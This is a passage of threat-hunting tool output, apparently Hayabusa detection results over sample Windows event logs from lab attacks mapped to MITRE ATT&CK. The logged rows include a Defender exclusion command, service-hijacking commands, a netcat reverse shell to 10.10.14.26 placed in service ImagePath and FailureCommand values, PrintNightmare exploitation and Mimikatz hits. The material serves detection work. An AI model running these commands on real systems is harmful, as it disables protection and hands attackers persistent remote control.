added (PowerShell).evtx +2021-10-06 11:14:56.435 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx +2021-10-06 11:15:06.651 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx +2021-10-06 11:15:06.667 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -ExclusionExtension '.exe',rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx +2021-10-06 11:15:06.754 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""ExclusionExtension""; value="".exe"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" 
ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): 
name=""DisableBehaviorMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" 
ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx +2021-10-06 11:15:06.755 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx +2021-10-06 11:15:06.762 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock 
Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx +2021-10-06 11:15:06.766 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx +2021-10-07 14:52:54.848 +00:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: REG ADD ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time"" /v FailureCommand /t REG_SZ /d ""C:\tmp\pentestlab.exe"" | Path: C:\Windows\System32\reg.exe | PID: 0x2a58 | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with Failure Command.evtx +2021-10-07 14:52:54.848 +00:00,win10-02.offsec.lan,4688,medium,Persis,Modification Of Existing Services For Persistence,,rules/sigma/process_creation_builtin/proc_creation_win_modif_of_services_for_via_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with Failure Command.evtx +2021-10-07 14:53:02.147 +00:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc failure W32Time command= ""\""c:\Windows\system32\pentestlab.exe\"""" | Path: C:\Windows\System32\sc.exe | PID: 0xa00 | User: admmig | LID: 
0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with Failure Command.evtx +2021-10-07 14:53:02.147 +00:00,win10-02.offsec.lan,4688,medium,Persis,Modification Of Existing Services For Persistence,,rules/sigma/process_creation_builtin/proc_creation_win_modif_of_services_for_via_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with Failure Command.evtx +2021-10-07 15:36:23.429 +00:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc config xboxgip binPath= ""C:\windows\system32\pentestlab.exe"" | Path: C:\Windows\System32\sc.exe | PID: 0x29cc | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with malicious path.evtx +2021-10-07 15:36:23.429 +00:00,win10-02.offsec.lan,4688,medium,Persis,Modification Of Existing Services For Persistence,,rules/sigma/process_creation_builtin/proc_creation_win_modif_of_services_for_via_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with malicious path.evtx +2021-10-07 15:36:24.892 +00:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\xboxgip"" /v ImagePath /t REG_SZ /d ""C:\tmp\pentestlab.exe"" | Path: C:\Windows\System32\reg.exe | PID: 0x11b8 | User: admmig | LID: 
0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with malicious path.evtx +2021-10-07 15:36:24.892 +00:00,win10-02.offsec.lan,4688,medium,Persis,Service ImagePath Change with Reg.exe,,rules/sigma/process_creation_builtin/proc_creation_win_reg_service_imagepath_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with malicious path.evtx +2021-10-07 15:36:24.892 +00:00,win10-02.offsec.lan,4688,medium,Persis,Modification Of Existing Services For Persistence,,rules/sigma/process_creation_builtin/proc_creation_win_modif_of_services_for_via_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with malicious path.evtx +2021-10-07 18:21:36.864 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with malicious path.evtx +2021-10-07 18:21:36.889 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Set-ItemProperty -path HKLM:\System\CurrentControlSet\services\xboxgip -name ImagePath -value ""C:\nc.exe -e powershell.exe 10.10.14.26 4447""",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with malicious path.evtx +2021-10-07 18:21:37.136 
+00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-ItemProperty): ""Set-ItemProperty"" ParameterBinding(Set-ItemProperty): name=""Path""; value=""HKLM:\System\CurrentControlSet\services\xboxgip"" ParameterBinding(Set-ItemProperty): name=""Name""; value=""ImagePath"" ParameterBinding(Set-ItemProperty): name=""Value""; value=""C:\nc.exe -e powershell.exe 10.10.14.26 4447""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with malicious path.evtx +2021-10-07 18:21:37.137 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with malicious path.evtx +2021-10-07 18:21:37.143 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with malicious path.evtx +2021-10-07 18:21:37.146 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with malicious path.evtx +2021-10-07 18:30:51.237 +00:00,win10-02.offsec.lan,4103,info,,PwSh 
Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with Failure Command.evtx +2021-10-07 18:30:51.247 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Set-ItemProperty -path HKLM:\System\CurrentControlSet\services\xboxgip -name FailureCommand -value ""C:\nc.exe -e powershell.exe 10.10.14.26 4447""",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with Failure Command.evtx +2021-10-07 18:30:51.251 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-ItemProperty): ""Set-ItemProperty"" ParameterBinding(Set-ItemProperty): name=""Path""; value=""HKLM:\System\CurrentControlSet\services\xboxgip"" ParameterBinding(Set-ItemProperty): name=""Name""; value=""FailureCommand"" ParameterBinding(Set-ItemProperty): name=""Value""; value=""C:\nc.exe -e powershell.exe 10.10.14.26 4447""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with Failure Command.evtx +2021-10-07 18:30:51.252 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with Failure Command.evtx +2021-10-07 
18:30:51.266 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with Failure Command.evtx +2021-10-07 18:30:51.269 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with Failure Command.evtx +2021-10-08 08:53:42.131 +00:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc sdset xboxgip ""D:(A;;CCLCSWRPWPDTLOCRRC;;;SY) | Path: C:\Windows\System32\sc.exe | PID: 0x1d28 | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service permissions modified (sc).evtx +2021-10-08 10:05:29.432 +00:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\XblGameSave\Security"" /v Security /t REG_BINARY /d fe340ead | Path: C:\Windows\System32\reg.exe | PID: 0x18c4 | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service permissions modified (registry).evtx +2021-10-08 10:05:29.432 +00:00,win10-02.offsec.lan,4688,low,Disc,Query 
Registry,,rules/sigma/process_creation_builtin/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service permissions modified (registry).evtx +2021-10-08 10:05:36.298 +00:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2af0 | User: WIN10-02$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service permissions modified (registry).evtx +2021-10-08 12:56:58.803 +00:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 12:57:04.504 +00:00,fs01.offsec.lan,4688,critical,PrivEsc,SystemNightmare Exploitation Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_exploit_systemnightmare.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 12:57:04.504 +00:00,fs01.offsec.lan,4688,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_builtin/proc_creation_win_local_system_owner_account_discovery.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 12:57:04.504 +00:00,fs01.offsec.lan,4688,medium,LatMov,Mounted Windows Admin Shares with 
net.exe,,rules/sigma/process_creation_builtin/proc_creation_win_net_use_admin_share.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 12:57:04.504 +00:00,fs01.offsec.lan,4688,low,Disc,Suspicious Listing of Network Connections,,rules/sigma/process_creation_builtin/proc_creation_win_susp_network_listing_connections.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 12:57:04.504 +00:00,fs01.offsec.lan,4688,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 12:57:06.763 +00:00,fs01.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: admmig | Target User: gentilguest | IP Address: 20.188.56.147 | Process: | Target Server: printnightmare.gentilkiwi.com,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 12:57:06.763 +00:00,fs01.offsec.lan,4648,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 12:57:06.869 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: rundll32 printui.dll,PrintUIEntry /in /n""\\printnightmare.gentilkiwi.com\Kiwi Legit Printer"" | Path: C:\Windows\System32\rundll32.exe | PID: 0x1670 | User: admmig | LID: 0x65b0f5db",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege 
Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 12:57:06.869 +00:00,fs01.offsec.lan,4688,critical,PrivEsc,SystemNightmare Exploitation Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_exploit_systemnightmare.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 12:57:06.869 +00:00,fs01.offsec.lan,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 12:57:06.869 +00:00,fs01.offsec.lan,4688,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 12:57:18.646 +00:00,fs01.offsec.lan,6416,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 12:57:19.072 +00:00,fs01.offsec.lan,6416,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 12:57:21.674 +00:00,fs01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-19 14:33:13.262 +00:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: 
admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1201-Password Policy Discovery/ID4688-Password policy discovery via commandline.evtx +2021-10-19 14:33:15.518 +00:00,FS03.offsec.lan,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1201-Password Policy Discovery/ID4688-Password policy discovery via commandline.evtx +2021-10-19 14:33:15.533 +00:00,FS03.offsec.lan,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1201-Password Policy Discovery/ID4688-Password policy discovery via commandline.evtx +2021-10-19 14:40:28.001 +00:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4688-Group discovery via commandline.evtx +2021-10-19 14:40:40.675 +00:00,FS03.offsec.lan,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4688-Group discovery via commandline.evtx +2021-10-19 14:40:40.691 +00:00,FS03.offsec.lan,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4688-Group discovery via commandline.evtx +2021-10-19 14:42:41.202 +00:00,FS03.offsec.lan,4688,medium,Persis,Net.exe User Account 
Creation,,rules/sigma/process_creation_builtin/proc_creation_win_net_user_add.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx +2021-10-19 14:42:41.202 +00:00,FS03.offsec.lan,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx +2021-10-19 14:42:41.218 +00:00,FS03.offsec.lan,4688,medium,Persis,Net.exe User Account Creation,,rules/sigma/process_creation_builtin/proc_creation_win_net_user_add.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx +2021-10-19 14:42:41.218 +00:00,FS03.offsec.lan,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx +2021-10-19 14:42:41.234 +00:00,FS03.offsec.lan,4720,low,Persis,Local User Account Created,User: toto3 | SID: 